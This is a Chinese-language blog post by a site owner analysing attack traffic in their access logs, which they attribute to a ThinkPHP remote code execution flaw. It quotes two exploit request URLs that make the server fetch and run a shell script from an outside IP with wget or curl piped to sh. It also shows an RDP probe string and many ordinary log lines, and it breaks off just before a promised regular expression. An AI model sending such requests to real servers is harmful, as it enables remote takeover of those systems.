\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击

2019-12-14

0评论

阅读

爱搜啊

$\x03\x00\x00*\xE0\x00\x00\x00\x00\x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击$

最近服务器又被攻击了，也是非常烦啊，查看日志发现是一段没见过的代码\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr

经过在网上查资料发现这是主要针对的是ThinkPHP的远程代码执行漏洞进行的攻击，

1、请求1：
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh
2、请求2：
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh
3、请求3：
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr

下面是详细的访问日志，查看日志最下面一行就是这段代码

123.125.71.15 - - [14/Dec/2019:20:05:24 +0800] "GET /post-2186.html HTTP/1.1" 200 38754 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

111.206.221.67 - - [14/Dec/2019:20:05:26 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 14 "https://ioozu.com/post-2186.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"

101.89.29.86 - - [14/Dec/2019:20:05:27 +0800] "GET /post-2642.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"

176.9.31.80 - - [14/Dec/2019:20:05:27 +0800] "GET /tags-1659.html HTTP/1.1" 200 6483 "-" "serpstatbot/1.0 (advanced backlink tracking bot; curl/7.58.0; http://serpstatbot.com/; abuse@serpstatbot.com)"

106.11.152.228 - - [14/Dec/2019:20:05:29 +0800] "GET /mip/post-2399.html HTTP/1.1" 200 3284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e YisouSpider/5.0 Safari/602.1"

176.9.31.80 - - [14/Dec/2019:20:05:31 +0800] "GET /tags-1658.html HTTP/1.1" 200 6399 "-" "serpstatbot/1.0 (advanced backlink tracking bot; curl/7.58.0; http://serpstatbot.com/; abuse@serpstatbot.com)"

61.158.146.103 - - [14/Dec/2019:20:05:33 +0800] "GET /post-2335.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"

61.158.146.103 - - [14/Dec/2019:20:05:33 +0800] "GET /post-2335.html HTTP/1.1" 200 10520 "-" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"

61.158.146.103 - - [14/Dec/2019:20:05:34 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 35 "https://ioozu.com/post-2335.html" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"

111.206.221.48 - - [14/Dec/2019:20:05:34 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 14 "https://ioozu.com/post-2186.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"

111.192.76.18 - - [14/Dec/2019:20:05:36 +0800] "GET /post-2404.html HTTP/1.1" 200 10237 "https://www.baidu.com/link?url=aDrR5TJzTiGwEtM7iCnGPPsLhLBO7TiMfSMHSQuBpYqUNBF80i9DeFYkH-Yt8VaK&wd=&eqid=cd068e0f000cf714000000025df4d000" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

111.192.76.18 - - [14/Dec/2019:20:05:36 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 35 "https://ioozu.com/post-2404.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

111.192.76.18 - - [14/Dec/2019:20:05:37 +0800] "GET /favicon.ico HTTP/1.1" 200 1962 "https://ioozu.com/post-2404.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

124.89.232.135 - - [14/Dec/2019:20:05:38 +0800] "GET /u/?url=www.ioozu.com%2Fpost-2335.html HTTP/1.1" 200 159 "https://ioozu.com/u/?url=http%3A%2F%2Fwww.ioozu.com%2Fpost-2335.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"

124.89.232.135 - - [14/Dec/2019:20:05:40 +0800] "GET /u/?url=https://ioozu.com/ HTTP/1.1" 200 663 "https://ioozu.com/u/?url=www.ioozu.com%2Fpost-2335.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"

124.89.232.135 - - [14/Dec/2019:20:05:40 +0800] "GET /u/?url=https://ioozu.com/&f=1 HTTP/1.1" 200 347 "https://ioozu.com/u/?url=https://ioozu.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"

185.153.199.3 - - [14/Dec/2019:20:05:46 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"

针对thinkphp的远程代码执行漏洞进行的攻击，下面写了一个正则表达式针对此攻击

正则表达式：